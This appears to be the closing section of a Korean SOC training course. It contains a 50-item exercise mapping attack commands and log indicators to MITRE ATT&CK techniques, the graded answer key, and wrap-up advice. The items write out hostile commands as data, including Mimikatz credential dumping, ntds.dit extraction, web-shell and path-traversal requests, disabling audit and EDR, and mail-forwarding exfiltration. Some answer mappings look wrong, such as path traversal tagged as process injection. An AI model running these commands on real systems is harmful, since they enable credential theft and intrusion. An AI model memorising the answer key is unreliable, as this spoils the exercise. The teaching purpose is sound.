26. rundll32.exe shell32.dll,ShellExec → ? 27. psexec \\10.0.0.80 -u admin cmd.exe → ? 28. cmd /c "copy C:\Users\*\*.docx C:\tmp" → ? 29. FW: 10.0.0.33→45.x.x.x:443 90s±4s 8hr → ? 30. useradd -G sudo hidden_user (Linux) → ? 31. netstat -ano | grep ESTABLISHED → ? 32. Sysmon 8: CreateRemoteThread in notepad.exe→ ? 33. auditpol /set /subcategory:* /success:disable→? 34. WinEvent 5001 EDR_Agent → stopped → ? 35. GET /wp-admin/shell.php?cmd=id → 200 uid=33→ ? 36. *.enc 확장자 파일 847개 생성 in 3min → ? 37. S3 버킷 public-read 설정 변경 (CloudTrail) → ? 38. PowerShell Invoke-Mimikatz -DumpCreds → ? 39. GET /index.php?file=../../../../etc/passwd → ? 40. IAM CreateUser + AttachUserPolicy FullAccess→ ? 41. taskkill /F /IM SecurityApp.exe → ? 42. Teams external: attach malicious.docm send → ? 43. Inbox Rule: ForwardTo=attkr@gmail.com → ? 44. whoami /all; ipconfig; net user (30sec) → ? 45. amsiInitFailed inside PS ScriptBlock → ? 46. kubectl exec -it pod-xyz -- /bin/sh → ? 47. Proxy: POST mega.nz 12GB arch.7z user:cfo → ? 48. bcdedit /set {default} safeboot minimal → ? 49. esentutl /y C:\Windows\NTDS\ntds.dit → ? 50. WinEvent 4662 DS-Replication-Get-Changes → ?

⏱️ 채점: 정확한 Technique (+2) + Sub-technique 명시 (+1) + 근거 1줄 (+1) = 최대 4점×50 = 200점 만점 | 30분 후 팀별 총점 비교

보강 설명 50개 공격 행위를 30분 안에 ATT&CK으로 매핑하는 최종 마라톤 실습입니다. 이 실습을 통해 수강생의 실제 실무 역량을 측정합니다. 팀 경쟁으로… 근거와 다음 행동을 함께 적어 두면 바로 실무에 쓰기 좋습니다.

50개 행위 마라톤30분 집중최종 역량 측정

풀이 힌트

문제의 첫 단서를 시간·사용자·프로세스·통신 중 어디서 찾을지 먼저 정리
50개 행위 마라톤를 고를 때 대체 설명도 함께 적기

마라톤 정답 (1~25번) — 발표 후 공개

틀린 항목을 찾아 왜 그 Technique인지 이해하는 것이 암기보다 중요하다

마라톤 해설 1

#	Technique	판단 근거
1	T1490	VSS 삭제 = 복구 방해 = 랜섬웨어 전조
2	T1547.001	HKCU\Run = 시작 시 자동 실행 Persistence
3	T1003.001	Mimikatz sekurlsa = LSASS 자격증명 덤프
4	T1046	ping 스윕 = 내부 네트워크 스캔
5	T1070.001	wevtutil cl = 보안 이벤트 로그 삭제
6	T1098	Domain Admins에 계정 추가 = 계정 조작
7	T1218 + T1105	certutil -urlcache = LOLBin 파일 다운로드
8	T1218.005	mshta + 원격 URL = System Binary Proxy
9	T1047	wmic /node:원격IP process create = WMI 원격 실행
10	T1562.001	Defender 실시간 보호 비활성화
11	T1567.002	Dropbox 5.2GB 업로드 = 클라우드 유출
12	T1568 + T1071	신생 도메인 + VT 악성 = DGA+C2
13	T1566.001 + T1059.001 + T1027	Excel 매크로→wscript→PS Base64 체인

#	Technique	판단 근거
14	T1558.003	RC4 TGS × 7 in 3분 = Kerberoasting
15	T1003.001	lsass.exe ProcessAccess + %ProgramData% 소스
16	T1059.004 + T1105	curl 파이프 bash = Unix Shell + Tool Transfer
17	T1039	xcopy \\filesvr = 네트워크 공유 드라이브 수집
18	T1053.005	SYSTEM + 매분 반복 + 알 수 없는 작업명 = Persistence
19	T1190	UNION SELECT SQLi + 200 응답 = 익스플로잇 성공
20	T1078 + T1133	해외 IP + VPN + 처음 보는 국가 = Impossible Travel
21	T1018	nltest /dclist = DC 목록 조회 = Remote System Discovery
22	T1218.010	regsvr32 /u /i + 원격 SCT = Squiblydoo
23	T1572	SSH -L = 포트 포워딩 = Protocol Tunneling
24	T1197 + T1105	bitsadmin /transfer + 외부 URL = BITS Jobs + Tool Transfer
25	T1070.001	wevtutil cl (보안 로그 삭제) = 증거 인멸

보강 설명 50개 마라톤 정답 상위 25개입니다. 발표 후 공개합니다. 팀별 점수를 집계하고 오답 항목을 함께 토론합니다. 근거와 다음 행동을 함께 적어 두면 바로 실무에 쓰기 좋습니다.

마라톤 정답채점오답 토론

풀이 힌트

문제의 첫 단서를 시간·사용자·프로세스·통신 중 어디서 찾을지 먼저 정리
마라톤 정답를 고를 때 대체 설명도 함께 적기

마라톤 정답 (26~50번) — 최종 채점 및 팀 순위

26~50번 정답 확인 → 팀별 최종 점수 집계 → 우승팀 발표 → 오답 핵심 포인트 토론

마라톤 해설 2 + 최종

#	Technique	판단 근거
26	T1218.011	rundll32 shell32 = LOLBin DLL 실행
27	T1569.002	PsExec 원격 = System Services 원격 실행
28	T1005 + T1074	사용자 docx 전체 복사 = 로컬 데이터 수집
29	T1071.001	90초 주기 + 8시간 지속 = HTTPS Beaconing
30	T1136.001 + T1098	Linux sudo 그룹 숨은 계정 = 백도어 계정
31	T1049	netstat -ano = 시스템 네트워크 연결 조회
32	T1055	CreateRemoteThread in notepad = Process Injection
33	T1562.002	auditpol 감사 비활성화 = SACL 우회
34	T1562.001	EDR 에이전트 서비스 중지 = 보안 도구 비활성화
35	T1505.003	웹쉘 실행 ?cmd=id = Web Shell
36	T1486	대량 .enc 확장자 = Data Encrypted for Impact
37	T1562.007 (또는 T1530)	S3 공개 설정 변경 = 클라우드 인프라 수정
38	T1003.001	PS Invoke-Mimikatz = in-memory LSASS dump

#	Technique	판단 근거
39	T1055.001 (또는 T1083)	../../../../etc/passwd = Path Traversal + File Discovery
40	T1136.004 + T1098.001	IAM 계정 생성 + FullAccess = 클라우드 백도어
41	T1562.001	보안 앱 프로세스 강제 종료 = 도구 비활성화
42	T1566.003	Teams 외부 → 악성 첨부 = Phishing via Service
43	T1114.003	이메일 자동 전달 규칙 = Email Forwarding Rule
44	T1082+T1016+T1087	30초 내 whoami+ipconfig+net user = 연쇄 Discovery
45	T1562.001	amsiInitFailed = AMSI Bypass 시도
46	T1609	kubectl exec pod shell = Container Admin API
47	T1567.002	mega.nz 12GB = Exfiltration to Cloud Storage
48	T1490	bcdedit safeboot = Recovery 비활성화
49	T1003.003	esentutl ntds.dit 복사 = NTDS.dit 추출
50	T1003.006	DS-Replication EventID 4662 = DCSync

보강 설명 50개 마라톤 정답 나머지 25개입니다. 총점 집계 후 팀별 순위를 발표하고 전체 복습으로 마무리합니다. 근거와 다음 행동을 함께 적어 두면 바로 실무에 쓰기 좋습니다.

마라톤 정답 26-50최종 채점팀 순위

풀이 힌트

문제의 첫 단서를 시간·사용자·프로세스·통신 중 어디서 찾을지 먼저 정리
마라톤 정답 26-50를 고를 때 대체 설명도 함께 적기

최종 완료: ATT&CK으로 설명하고 로그로 증명하고 액션으로 끝낸다

300여 장의 학습 흐름을 완주 — 이제 ATT&CK을 언어로, 로그를 증거로, 대응을 행동으로 연결할 차례

최종 완료

🎉 축하합니다. 이제 여러분은 개별 경보를 보는 분석가가 아니라, 공격자의 행동을 서사로 해석하고 증거로 뒷받침하며 대응까지 제안하는 분석가로 한 단계 올라섰습니다.

총 슬라이드

300+ 장 분량의 ATT&CK 학습 흐름을 완주했습니다.

다룬 Technique

100+ 개 이상 Technique를 로그·사례와 함께 살폈습니다.

실습·시나리오

40+ 개 이상의 실전형 분석 문제로 판단 연습을 했습니다.

남겨야 할 습관

매일 하나의 이벤트를 ATT&CK 문장으로 다시 써 보는 습관이 중요합니다.

오늘 이후 바로 실천할 것

1일 1문장: 실제 경보 하나를 ATT&CK 기반 보고 문장으로 재작성
1주 1검토: 현재 운영 중인 룰을 Tactic·Technique·Data Source 기준으로 재점검
1달 1개선: Coverage 공백 한 곳을 골라 데이터 수집, 룰, 플레이북 중 하나를 개선

보강 설명 최종 완료 페이지는 교육을 끝내는 인사보다 더 중요하게, 앞으로 어떻게 실무에 연결할지 방향을 남겨 주는 역할을 합니다. ATT&CK 언어, 로그 근거, 대응 액션이라는 세 축을 계속 반복하면 실제 SOC 현장에서 빠르게 성장할 수 있습니다.

최종 완료300장 완주실무 SOC

완주 의미

개념 암기가 아니라 설명 가능한 수준으로 도달하기
로그와 ATT&CK을 연결하는 사고를 체득하기
대응 액션까지 제안하는 습관 만들기

현장 적용

현재 룰과 대시보드를 ATT&CK 기준으로 다시 보기
탐지되지 않는 구간을 공백으로 명시하기
문서와 티켓 문장을 같은 언어로 통일하기

성장 루틴

하루 하나의 로그를 ATT&CK으로 다시 써 보기
주간 회고 때 오탐·미탐 이유를 남기기
분기별로 Coverage 개선 결과를 점검하기